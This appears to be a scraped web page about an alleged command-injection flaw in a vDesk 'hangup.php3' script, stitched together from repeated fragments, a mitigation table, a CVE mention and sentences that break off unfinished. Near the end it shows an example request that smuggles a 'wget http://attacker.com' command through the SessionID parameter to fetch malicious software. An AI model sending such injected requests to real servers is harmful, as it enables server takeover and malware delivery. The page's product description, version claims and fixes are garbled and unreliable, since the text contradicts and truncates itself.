Sometimes sessions are logged out unexpectedly at random intervals due to the "Fallback Host" being incorrectly configured as /vdesk/hangup.php3 in the HTTP profile. False Positives: Many "exploit" reports involving hangup.php3
VDesk is a popular virtual desktop software that allows users to access and interact with virtual machines (VMs) remotely. The software provides a range of features, including VM management, user authentication, and session management. The Hangup PHP 3 plugin is a component of VDesk that enables users to manage and interact with virtual desktops using PHP scripts.
| Solution | Effectiveness | |----------|---------------| | to version 4.0+ (rewritten without pcntl signal hacks) | Complete | | Disable pcntl in PHP ( disable_functions = pcntl_fork, pcntl_signal ) | High | | Switch to Redis session handler (atomic operations) | High | | Apply web application firewall (WAF) rule blocking hangup.php3?sig_type=SIGHUP | Medium | | Migrate from PHP 3.x/5.x to PHP 8.x (built-in session hardening) | Required | vdesk hangupphp3 exploit
If your vDesk version is end-of-life, you can hot-patch hangup.php3 by adding at the top:
: Full system compromise, unauthorized session termination, and data exposure Sometimes sessions are logged out unexpectedly at random
Full system compromise, as the attacker can run commands with the privileges of the web server (e.g., 2. How the Exploit Works (Conceptual)
: Invalidates the unique session ID within the system's local memory configuration, immediately cutting active resource access. The Hangup PHP 3 plugin is a component
An attacker exploiting this vulnerability could achieve several critical objectives:
The specific XSS in my.logon.php3 is just one of listed under CVE-2007-0186. The full scope includes:
GET /vdesk/hangup.php3?SessionID=1234;%20wget%20http://attacker.com HTTP/1.1 Host: target-vdesk-server.com User-Agent: Mozilla/5.0 Use code with caution. In this scenario: The script reads the SessionID . The semicolon finishes the intended internal command. The server executes wget to download malicious software.